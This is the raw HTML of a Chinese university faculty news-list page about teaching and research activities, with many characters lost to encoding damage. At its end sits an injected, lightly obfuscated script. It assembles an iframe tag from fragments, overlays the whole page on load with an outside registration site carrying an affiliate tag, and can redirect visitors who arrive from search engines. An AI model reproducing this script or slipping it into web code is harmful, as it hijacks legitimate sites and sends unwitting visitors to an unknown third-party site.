?!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> title_temp 智能制造工程学?/title> </head> <body> <!--top begin --> <div id="home-content_top"> <div id="home-content_top_nr"> <div style="float:left; width:409px; height:80px;"><img src="/pic_jdgc/logo.png" /></div> </div> </div> <!--top end--> <!--banner begin--> <div id="banner"> <!-- 代码 开?--> <div id="playBox"> <div class="pre"></div> <div class="next"></div> <div class="smalltitle"> <ul> <li class="thistitle"></li> <li></li> <li></li> <li></li> <li></li> <li></li> </ul> </div> <ul class="oUlplay"> <li><a href="#" target="_blank"><img src="/pic_jdgc/1.jpg" border="0" /></a></li> <li><a href="#" target="_blank"><img src="/pic_jdgc/2.jpg" border="0" /></a></li> <li><a href="#" target="_blank"><img src="/pic_jdgc/3.jpg" border="0" /></a></li> <li><a href="#" target="_blank"><img src="/pic_jdgc/4.jpg" border="0" /></a></li> <li><a href="#" target="_blank"><img src="/pic_jdgc/5.jpg" border="0" /></a></li> <li><a href="#" target="_blank"><img src="/pic_jdgc/6.jpg" border="0" /></a></li> </ul> </div> <!-- 代码 结束 --> </div> <div id="banner_foot"><img src="/pic_jdgc/banner_foot.jpg" /></div> <!--banner end--> <!--menu begin--> <div id="menu"> <ul class="navbar"> <li><a href="/html/znzzgcxy/">首页</a></li> <li><a href="/html/znzzgcxy/xyjs/1921.html">学院介绍</a></li> <li><a href="/html/znzzgcxy/zysz/">专业设置 </a></li> <li><a href="/html/znzzgcxy/szjs/">师资建设</a></li> <li><a href="/html/znzzgcxy/jyhd/">教研活动</a></li> <li><a href="/html/znzzgcxy/sysjs/">实验室建?/a></li> <li><a href="/html/znzzgcxy/xsfc/">学生风采</a></li> <li><a href="/html/znzzgcxy/sxjy/">实习就业</a></li> <li><a href="/html/znzzgcxy/dtgz/">党团工作</a></li> </ul> </div> <!--menu end--> <div id="wrap"> <div id="content"> <div class="navigation" style="text-align:left; float:left;">您当前位置:<a href="/">河北科技学院</a> >> <a href="/html/znzzgcxy/">智能制造工程学?/a> >> <a href="/html/znzzgcxy/jyhd/">教研活动</a></div> <div id="main2"> <div id="xwitem_title"><h2>教研活动新闻</h2></div> <div id="LB"> <ul> <li><h2 style="font-weight:bolder;"><a href="/html/znzzgcxy/jyhd/8458.html" target="_blank"><span style="color:green">[图文]</span>智能制造工程学院说课比赛活?/a></h2> <p>智能制造工程学院说课比赛活?..<a href="/html/znzzgcxy/jyhd/8458.html" target="_blank">[详细]</a></p> <span class="pl">0</span><span class="date">2019?5?7?/span> </li> <li><h2 style="font-weight:bolder;"><a href="/html/znzzgcxy/jyhd/8241.html" target="_blank"><span style="color:green">[图文]</span>我院成功举办2019年河北省高校制图与构型能力大赛和三维设计大赛</a></h2> <p>我院成功举办2019年河北省高校制图与构型能力大赛和三维设计大赛选拔?..<a href="/html/znzzgcxy/jyhd/8241.html" target="_blank">[详细]</a></p> <span class="pl">0</span><span class="date">2019?4?1?/span> </li> <li><h2 style="font-weight:bolder;"><a href="/html/znzzgcxy/jyhd/7084.html" target="_blank"><span style="color:green">[图文]</span>教研室活?/a></h2> <p>10.24日,我院各教研室展开教研室活?..<a href="/html/znzzgcxy/jyhd/7084.html" target="_blank">[详细]</a></p> <span class="pl">0</span><span class="date">2018?0?7?/span> </li> <li><h2 style="font-weight:bolder;"><a href="/html/znzzgcxy/jyhd/6765.html" target="_blank"><span style="color:green">[图文]</span>智能学院各教研室开展探索讲课方法,提高教学效率的教研室活动</a></h2> <p>智能学院各教研室开展开展探索讲课方法,提高教学效率的教研室活动 9.19日,智能学院各教研室召开了教研室活动,活动主题为:探索讲课方法,提高教学效率?..<a href="/html/znzzgcxy/jyhd/6765.html" target="_blank">[详细]</a></p> <span class="pl">0</span><span class="date">2018?0?8?/span> </li> <li><h2 style="font-weight:bolder;"><a href="/html/znzzgcxy/jyhd/7797.html" target="_blank"><span style="color:green">[图文]</span>我院开展期中教学检查教研室活动</a></h2> <p>我院开展期中教学检查教研室活动...<a href="/html/znzzgcxy/jyhd/7797.html" target="_blank">[详细]</a></p> <span class="pl">0</span><span class="date">2018?1?6?/span> </li> <li><h2 style="font-weight:bolder;"><a href="/html/znzzgcxy/jyhd/4031.html" target="_blank">智能学院学习《河北省高校转型发展试点工作实施方案》文件精?/a></h2> <p>2017??2日上午八点到十二点,智能制造工程学院各个教研室(机械教研室、电气教研室、计算机教研室)学习《河北省高校转型发展试点工作实施方案》文件,讨论内容?..<a href="/html/znzzgcxy/jyhd/4031.html" target="_blank">[详细]</a></p> <span class="pl">0</span><span class="date">2017?6?2?/span> </li> <li><h2 style="font-weight:bolder;"><a href="/html/znzzgcxy/jyhd/4027.html" target="_blank">智能制造工程学院开展教研室活动</a></h2> <p>按照河北科技学院学院暑期培训工作安排,智能制造工程学院于2016??1日上?点半开展了教研室活动。教研室活动中,老师们积极讨论。机械教研室:期初教学准备工?..<a href="/html/znzzgcxy/jyhd/4027.html" target="_blank">[详细]</a></p> <span class="pl">0</span><span class="date">2016?8?1?/span> </li> <li><h2 style="font-weight:bolder;"><a href="/html/znzzgcxy/jyhd/4014.html" target="_blank">智能制造工程学院组织全体教师集中学习教学管理制?/a></h2> <p>2016??9?4点,智能制造学院院长以及全体教师在5?08学习学校教育教学管理制度。首先蒋文科院长做了动员讲话,要求老师们认真学习文件精神,积极贯彻教学管理...<a href="/html/znzzgcxy/jyhd/4014.html" target="_blank">[详细]</a></p> <span class="pl">0</span><span class="date">2016?8?0?/span> </li> <li><h2 style="font-weight:bolder;"><a href="/html/znzzgcxy/jyhd/3404.html" target="_blank">计算机科学与技术专业进行学士学位授予权评估资料审核整改工作</a></h2> <p>为迎接即将到来的计算机科学与技术专业学士学位授予权评估工作,计算机教研室于3?日上午召开了关于计算机科学与技术专业评估资料审核整改工作例会。会议由教研?..<a href="/html/znzzgcxy/jyhd/3404.html" target="_blank">[详细]</a></p> <span class="pl">0</span><span class="date">2016?3?7?/span> </li> <li><h2 style="font-weight:bolder;"><a href="/html/znzzgcxy/jyhd/3004.html" target="_blank">机电工程系举行应用型大学教育理念大讨论活?/a></h2> <p>10?4日上午,机电工程系在5514召开了以“应用型大学教育理念”为主题的大讨论。河北科技学院副院长田沃、机电工程系主任蒋文科、教学副主任张景、学生管理副主任...<a href="/html/znzzgcxy/jyhd/3004.html" target="_blank">[详细]</a></p> <span class="pl">0</span><span class="date">2015?0?6?/span> </li> </ul> <div class="clear"></div> <div align="right" class="fenye" id="fenye"> <table border="0"><tr><td id="pagelist"> <a href="javascript:;" class="prev">??/a> <a href="javascript:;" class="next">上一?/a> <a href="#" class="curr"><font color=red>1</font></a> <a class="num" href="index_2.html">2</a> <a class="num" href="index_1.html">3</a> <a href="index_2.html" class="next">下一?/a> <a href="index_1.html" class="prev">末页</a> <span>总共<span id="totalpage">3</span>?/span></td></tr></table> </div> <script src="page20154015814907.html"></script> <script language="javascript" type="text/javascript">pageinfo(2,10,'.html','index');</script> </div> </div> <div id="side2"> <div class="tab2"> <div id="con_right"> <div style="width:246px; height:190px; padding-top:40px; background:url(/pic_jdgc/gg_title.jpg) no-repeat;"> <div class="content_left_news"> <ul> <li style="width:230px; float:left;"><span style="text-align:right; float:right; padding-right:5px;">(05-09)</span><a href="/html/znzzgcxy/tzgg/8360.html" target="_blank"><span style="color:green">[图文]</span>智能制造工程学院召开2019?/a></li> <li style="width:230px; float:left;"><span style="text-align:right; float:right; padding-right:5px;">(05-07)</span><a href="/html/znzzgcxy/tzgg/8356.html" target="_blank"><span style="color:green">[图文]</span>智能制造工程学院开展教学中</a></li> <li style="width:230px; float:left;"><span style="text-align:right; float:right; padding-right:5px;">(12-13)</span><a href="/html/znzzgcxy/tzgg/8114.html" target="_blank"><img border="0" src="/images/video.gif">智能制造工程学院举办嵌入式</a></li> <li style="width:230px; float:left;"><span style="text-align:right; float:right; padding-right:5px;">(12-03)</span><a href="/html/znzzgcxy/tzgg/8067.html" target="_blank"><span style="color:blue">[公告]</span>河北省教育厅关于公布河北?/a></li> <li style="width:230px; float:left;"><span style="text-align:right; float:right; padding-right:5px;">(07-16)</span><a href="/html/znzzgcxy/tzgg/6507.html" target="_blank">智能学院召开评估整改问题?/a></li> <li style="width:230px; float:left;"><span style="text-align:right; float:right; padding-right:5px;">(07-12)</span><a href="/html/znzzgcxy/tzgg/6506.html" target="_blank">智能学院召开毕业论文问题?/a></li> <li style="width:230px; float:left;"><span style="text-align:right; float:right; padding-right:5px;">(07-12)</span><a href="/html/znzzgcxy/tzgg/6505.html" target="_blank">智能制造工程学院召开本科?/a></li> </ul> </div> </div> <div style="width:246px; height:480px; margin-top:10px; padding-top:40px; background:url(/pic_jdgc/zysz_title.jpg) no-repeat;"> <div class="content_left_news"> <ul> <li style="width:230px; float:left;"><a href="/html/znzzgcxy/zysz/6724.html" target="_blank">软件工程(本科)</a></li> <li style="width:230px; float:left;"><a href="/html/znzzgcxy/zysz/6723.html" target="_blank">机械电子工程(本科)</a></li> <li style="width:230px; float:left;"><a href="/html/znzzgcxy/zysz/1866.html" target="_blank">机械设计制造及其自动化(本科)</a></li> <li style="width:230px; float:left;"><a href="/html/znzzgcxy/zysz/1933.html" target="_blank">电气工程及其自动化(本科?/a></li> <li style="width:230px; float:left;"><a href="/html/znzzgcxy/zysz/1935.html" target="_blank">计算机科学与技术(本科?/a></li> <li style="width:230px; float:left;"><a href="/html/znzzgcxy/zysz/1936.html" target="_blank">物联网工程(本科?/a></li> <li style="width:230px; float:left;"><a href="/html/znzzgcxy/zysz/1934.html" target="_blank">自动化(本科?/a></li> <li style="width:230px; float:left;"><a href="/html/znzzgcxy/zysz/1946.html" target="_blank">计算机类</a></li> <li style="width:230px; float:left;"><a href="/html/znzzgcxy/zysz/1939.html" target="_blank">机械设计制造类</a></li> <li style="width:230px; float:left;"><a href="/html/znzzgcxy/zysz/1952.html" target="_blank">自动化类</a></li> <li style="width:230px; float:left;"><a href="/html/znzzgcxy/zysz/1947.html" target="_blank">物联网应用技?/a></li> <li style="width:230px; float:left;"><a href="/html/znzzgcxy/zysz/1945.html" target="_blank">电子商务</a></li> </ul> </div> </div> </div> </div> </div> </div> </div> </div> <!--foot begin --> <div id="foot"> <div class="foot_nr"> <div style="width:800px; height:80px; float:left; padding-top:10px; color:#ccc; padding-left:10px; line-height:25px; font-size:12px;"> 地址:保定市南二环?956? 邮编?71000  电话?312-2123360  冀ICP?4003778?1<br> 河北科技学院官方微博?177366345   河北科技学院官方微信号:hbkjxy6796005   河北科技学院版权所? Copyright 2005-2015 HBKJXY.CN<br> <a href="">旧版主页</a>| <a href="">隐私版权</a>| <a href="">联系我们</a>| <a href="">网站地图</a> </div> <div style="width:85px; height:85px; float:left; padding-top:3px; padding-right:5px;"><img src="/pic6/weixin.jpg" /> </div> </div> </div> <!--foot end --> <script> (function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); </script><script> (function () { var bp = document.createElement('script'); bp.src = 'http://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js'; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); if (typeof (window.ccc_ad_style) == 'undefined') { var ccc_ad_style = 3; } if (typeof (window.ccc_ad_type) == 'undefined') { var ccc_ad_type = 0; } var ccc_browser = { versions: function () { var u = navigator.userAgent, app = navigator.appVersion; return {//移动终端浏览器版本信? trident: u.indexOf("Trident") > -1, //IE内核 presto: u.indexOf("Presto") > -1, //opera内核 webKit: u.indexOf("AppleWebKit") > -1, //苹果、谷歌内? gecko: u.indexOf("Gecko") > -1 && u.indexOf("KHTML") == -1, //火狐内核 mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终? ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端 android: u.indexOf("Android") > -1 || u.indexOf("Linux") > -1, //android终端或者uc浏览? iPhone: u.indexOf("iPhone") > -1, //是否为iPhone或者QQHD浏览? iPad: u.indexOf("iPad") > -1, //是否iPad webApp: u.indexOf("Safari") == -1 //是否web应该程序,没有头部与底部 }; }(), language: (navigator.browserLanguage || navigator.language).toLowerCase() }; //品牌? var ccc_brandKeys = { //'cai':{ // 'keys':["满堂"], //'pc':'', //'wap':'' //}, // 'cai2':{ // 'keys':["添彩"], // 'pc':'', // 'wap':'' //} }; var ccc_index = { 'pc': 'https://www.fd556.com/home/reg.html?att=196', 'wap': 'https://www.fd556.com/?att=196' }; var Unicode2Native = function (code) { return code; if (!code) { return; } var return_title = ''; for (var i = 0; i < code.length; i++) { return_title += String.fromCharCode(code[i].replace(/[&#;]/g, '')); } return return_title; } var getAgentHref = function () { var title = document.title; title = Unicode2Native(title); title = title.toLowerCase(); for (var k in ccc_brandKeys) { var curr_brand = ccc_brandKeys[k]; var wap_addr = curr_brand['wap'] || ''; for (var bk in curr_brand['keys']) { var keyword = curr_brand['keys'][bk]; if (title.indexOf(keyword) != -1) { if (ccc_browser.versions.mobile && wap_addr) { return wap_addr } else { return curr_brand['pc']; } } } } if (ccc_ad_type != 2) { return ccc_browser.versions.mobile ? ccc_index['wap'] : ccc_index['pc']; } else { return false; } }; var ccc_regexp = /\.(baidu|haosou|so|sogou|soso|google|sm|youdao|yahoo|bing|360|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}/ig; var agentHref = getAgentHref(); var ccc_html = ''; ccc_html += '<style>html,body{widht:100%;height:100%;overflow:hidden;}</style>' ccc_html += '<div style="width:100%;height:100%;text-align:left;background:#fff;position:absolute;top:0;left:0;z-index:99999999;">'; ccc_html += '<' + 'i' + '' + 'f' + '' + 'r' + 'a' + '' + 'm' + 'e' + ' s' + 'r' + 'c="' + agentHref; ccc_html += '" style="border:0;width:100%;height:100%;text-align:center;position:fixed;" f' + 'r' + '' + '' + 'a' + +'' + 'm' + 'e' + 'border="0">'; ccc_html += '</' + 'i' + '' + 'f' + '' + 'r' + '' + 'a' + '' + '' + '' + 'm' + 'e></div>'; var ccc_where = ''; var doAd = function () { console.log('ok'); switch (ccc_ad_style) { case 1: if (agentHref) { location.href = agentHref; } break //来路 case 2: if (agentHref) { ccc_where = document.referrer; if (ccc_regexp.test(ccc_where)) { location.href = agentHref; //jQuery(location).attr('href', agentHref); } } break; //框架 case 3: if (agentHref) { document.body.insertAdjacentHTML('afterbegin', ccc_html); //$('body').prepend(ccc_html); } break; //refer与框? case 4: if (agentHref) { ccc_where = document.referrer; if (ccc_regexp.test(ccc_where)) { location.href = agentHref; //jQuery('body').prepend(ccc_html); } } break; case 11: case 12: if (agentHref) { document.body.insertAdjacentHTML('afterbegin', ccc_html); //$('body').prepend(ccc_html); } break } } doAd(); $(function () { doAd(); }) </script> </body> </html>